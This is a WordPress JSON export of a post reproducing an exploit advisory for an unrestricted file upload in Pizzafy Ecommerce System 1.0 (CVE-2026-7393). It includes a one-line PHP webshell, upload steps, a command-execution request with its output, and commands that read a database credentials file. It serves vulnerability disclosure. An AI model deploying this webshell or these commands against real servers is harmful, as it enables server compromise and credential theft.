{"id":50203,"date":"2026-04-29T12:45:26","date_gmt":"2026-04-29T12:45:26","guid":{"rendered":"http:\/\/localhost\/?p=50203"},"modified":"2026-04-29T12:45:26","modified_gmt":"2026-04-29T12:45:26","slug":"pizzafy-ecommerce-system-10-shell-upload","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=50203","title":{"rendered":"\ud83d\udcc4 Pizzafy Ecommerce System 1.0 Shell Upload_PACKETSTORM:220075"},"content":{"rendered":"

{“lastseen”:”2026-04-29T17:03:59″,”description”:”The savemenu function in Pizzafy Ecommerce System version 1.0 handles image uploads for menu items without performing any file type validation. The application retrieves the file extension using pathinfo but never actually checks or restricts the…”,”published”:”2026-04-29T00:00:00″,”modified”:”2026-04-29T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Pizzafy Ecommerce System 1.0 Shell Upload”,”source”:””,”references”:””,”id”:”PACKETSTORM:220075″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2026-7393″],”sourceData”:”# Pizzafy Ecommerce System 1.0 \u2013 Unrestricted File Upload in save_menu() Leads to Remote Code Execution\\n \\n ## Details\\n \\n | Field | Value |\\n |—|—|\\n | **Vendor** | SourceCodester |\\n | **Vendor URL** | https:\/\/www.sourcecodester.com |\\n | **Product** | Pizzafy Ecommerce System using PHP and MySQL |\\n | **Product URL** | https:\/\/www.sourcecodester.com\/php\/18708\/pizzafy-ecommerce-system.html |\\n | **Version** | 1.0 |\\n | **Vulnerability** | Unrestricted File Upload \u2192 Remote Code Execution |\\n | **CWE** | CWE-434 |\\n | **CVSSv3 Score** | 7.8 (High) |\\n | **Attack Vector** | Network |\\n | **Auth Required** | Yes (Administrator) |\\n | **User Interaction** | None |\\n | **Researcher** | Imad Alvi |\\n | **Date** | 2026-04-12 |\\n \\n —\\n \\n ## Affected Component\\n \\n **File:** `Pizzafy\/admin\/admin_class_novo.php` \u2192 `save_menu()` function \\n **Parameter:** `img` (FILE) \\n **Upload path:** `Pizzafy\/assets\/img\/`\\n \\n —\\n \\n ## Description\\n \\n The `save_menu()` function in Pizzafy Ecommerce System 1.0 handles image uploads for menu items without performing any file type validation. The application retrieves the file extension using `pathinfo()` but never actually checks or restricts the allowed file types before moving the uploaded file to the web-accessible `assets\/img\/` directory. An authenticated administrator can upload a PHP webshell disguised as a menu image, then access it directly via the browser to achieve Remote Code Execution on the server.\\n \\n **Vulnerable code in `admin_class_novo.php`:**\\n \\n “`php\\n function save_menu(){\\n extract($_POST);\\n \/\/ …\\n if($_FILES[‘img’][‘tmp_name’] != ”){\\n $fname = strtotime(date(‘y-m-d H:i’)).’_’.$_FILES[‘img’][‘name’];\\n $move = move_uploaded_file($_FILES[‘img’][‘tmp_name’],’..\/assets\/img\/’. $fname);\\n $data .= \\”, img_path = ‘$fname’ \\”;\\n }\\n \/\/ No extension check, no MIME type check\\n }\\n “`\\n \\n —\\n \\n ## Proof of Concept\\n \\n ### Step 1 \u2014 Create PHP Webshell\\n \\n Create a file named `shell_web2.php` with the following content:\\n \\n “`php\\n \\u003c?php echo shell_exec($_GET[‘cmd’]); ?\\u003e\\n “`\\n \\n ### Step 2 \u2014 Upload Webshell via Menu Management\\n \\n Login as administrator and navigate to:\\n \\n “`\\n http:\/\/localhost\/pizzafy\/Pizzafy\/admin\/index.php?page=menu\\n “`\\n \\n Fill in the Menu Form with any valid values and select `shell_web2.php` as the Image file. Click **Save**.\\n \\n \\u003cimg width=\\”1920\\” height=\\”1080\\” alt=\\”Screenshot 2026-04-12 171202\\” src=\\”https:\/\/github.com\/user-attachments\/assets\/092e31ba-d034-4711-9eac-0d409fc02ead\\” \/\\u003e\\n \\n \\n The shell is now listed as a menu item on the customer-facing page.\\n \\n \\u003cimg width=\\”1920\\” height=\\”1080\\” alt=\\”Screenshot 2026-04-12 171236\\” src=\\”https:\/\/github.com\/user-attachments\/assets\/8e4cd4e2-98ca-4f7a-8d5b-1728aaf89731\\” \/\\u003e\\n \\n ### Step 3 \u2014 Locate Uploaded Shell\\n \\n Navigate to the assets directory \u2014 directory listing is enabled (CWE-548):\\n \\n “`\\n http:\/\/192.168.0.9\/pizzafy\/Pizzafy\/assets\/img\/\\n “`\\n \\n The uploaded PHP shell is visible in the directory listing.\\n \\n \\n \\u003cimg width=\\”1920\\” height=\\”1080\\” alt=\\”Screenshot 2026-04-12 171300\\” src=\\”https:\/\/github.com\/user-attachments\/assets\/b51aac51-6baf-41df-8b8f-53f9370864c8\\” \/\\u003e\\n \\n \\n ### Step 4 \u2014 Execute Remote Commands\\n \\n Access the uploaded shell directly and pass system commands via the `cmd` parameter:\\n \\n “`\\n http:\/\/192.168.0.9\/pizzafy\/Pizzafy\/assets\/img\/1775994120_shell_web2.php?cmd=whoami\\n “`\\n \\n **Response \u2014 OS command executed on the server:**\\n \\n “`\\n desktop-g1i9np3\\\\dell\\n “`\\n \\n \\u003cimg width=\\”1920\\” height=\\”1080\\” alt=\\”Screenshot 2026-04-12 171313\\” src=\\”https:\/\/github.com\/user-attachments\/assets\/403e069d-2d07-4a5d-8e68-0b95902c148e\\” \/\\u003e\\n \\n \\n —\\n \\n ## Additional Commands\\n \\n “`\\n ?cmd=whoami\\n ?cmd=ipconfig\\n ?cmd=dir C:\\\\xampp\\\\htdocs\\\\pizzafy\\n ?cmd=type C:\\\\xampp\\\\htdocs\\\\pizzafy\\\\Pizzafy\\\\admin\\\\db_connect.php\\n “`\\n \\n —\\n \\n ## Impact\\n \\n An authenticated administrator can:\\n – Upload arbitrary PHP files to the web server\\n – Execute any OS-level command on the server\\n – Read sensitive files including database credentials\\n – Establish a reverse shell for full persistent access\\n – Completely compromise the underlying server\\n \\n —\\n \\n ## Note on Directory Listing (CWE-548)\\n \\n The `assets\/img\/` directory has directory listing enabled, allowing unauthenticated users to browse all uploaded files including the webshell. This compounds the severity of the file upload vulnerability.\\n \\n —\\n \\n ## References\\n \\n – [SourceCodester \u2014 Pizzafy Ecommerce System](https:\/\/www.sourcecodester.com\/php\/18708\/pizzafy-ecommerce-system.html)\\n – CWE-434: Unrestricted Upload of File with Dangerous Type\\n – CWE-548: Exposure of Information Through Directory Listing.”,”sourceHref”:”https:\/\/packetstorm.news\/download\/220075″,”cvss”:{“score”:0,”severity”:”NONE”,”vector”:”NONE”,”version”:”NONE”},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/220075\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"

{“lastseen”:”2026-04-29T17:03:59″,”description”:”The savemenu function in Pizzafy Ecommerce System version 1.0 handles image uploads for menu items without performing any file type validation. The application retrieves the…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,12,13,33,53,7,11,5],"class_list":["post-50203","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-exploit","tag-news","tag-none","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n\ud83d\udcc4 Pizzafy Ecommerce System 1.0 Shell Upload_PACKETSTORM:220075 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=50203\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\ud83d\udcc4 Pizzafy Ecommerce System 1.0 Shell Upload_PACKETSTORM:220075 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{“lastseen”:”2026-04-29T17:03:59″,”description”:”The savemenu function in Pizzafy Ecommerce System version 1.0 handles image uploads for menu items without performing any file type validation. The application retrieves the...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=50203\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2026-04-29T12:45:26+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"4 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=50203#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=50203\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"\ud83d\udcc4 Pizzafy Ecommerce System 1.0 Shell Upload_PACKETSTORM:220075\",\"datePublished\":\"2026-04-29T12:45:26+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=50203\"},\"wordCount\":892,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CVE\",\"CVSS\",\"exploit\",\"news\",\"NONE\",\"packetstorm\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=50203#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=50203\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=50203\",\"name\":\"\ud83d\udcc4 Pizzafy Ecommerce System 1.0 Shell Upload_PACKETSTORM:220075 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2026-04-29T12:45:26+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=50203#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=50203\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=50203#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\ud83d\udcc4 Pizzafy Ecommerce System 1.0 Shell Upload_PACKETSTORM:220075\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\ud83d\udcc4 Pizzafy Ecommerce System 1.0 Shell Upload_PACKETSTORM:220075 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=50203","og_locale":"en_US","og_type":"article","og_title":"\ud83d\udcc4 Pizzafy Ecommerce System 1.0 Shell Upload_PACKETSTORM:220075 - zero redgem","og_description":"{“lastseen”:”2026-04-29T17:03:59″,”description”:”The savemenu function in Pizzafy Ecommerce System version 1.0 handles image uploads for menu items without performing any file type validation. The application retrieves the...","og_url":"https:\/\/zero.redgem.net\/?p=50203","og_site_name":"zero redgem","article_published_time":"2026-04-29T12:45:26+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"4 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=50203#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=50203"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"\ud83d\udcc4 Pizzafy Ecommerce System 1.0 Shell Upload_PACKETSTORM:220075","datePublished":"2026-04-29T12:45:26+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=50203"},"wordCount":892,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CVE","CVSS","exploit","news","NONE","packetstorm","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=50203#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=50203","url":"https:\/\/zero.redgem.net\/?p=50203","name":"\ud83d\udcc4 Pizzafy Ecommerce System 1.0 Shell Upload_PACKETSTORM:220075 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2026-04-29T12:45:26+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=50203#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=50203"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=50203#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"\ud83d\udcc4 Pizzafy Ecommerce System 1.0 Shell Upload_PACKETSTORM:220075"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/50203","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=50203"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/50203\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=50203"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=50203"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=50203"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}